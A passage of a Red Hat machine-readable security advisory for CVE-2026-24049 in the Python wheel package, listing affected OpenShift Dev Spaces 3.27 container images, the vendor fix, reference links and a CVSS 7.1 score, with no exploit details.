"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24049"
},
{
"category": "external",
"summary": "RHBZ#2431959",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431959"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24049"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24049"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef",
"url": "https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/releases/tag/0.46.2",
"url": "https://github.com/pypa/wheel/releases/tag/0.46.2"
},
{
"category": "external",
"summary": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx",
"url": "https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx"
}
],
"release_date": "2026-01-22T04:02:08.706000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-30T15:41:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6192"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
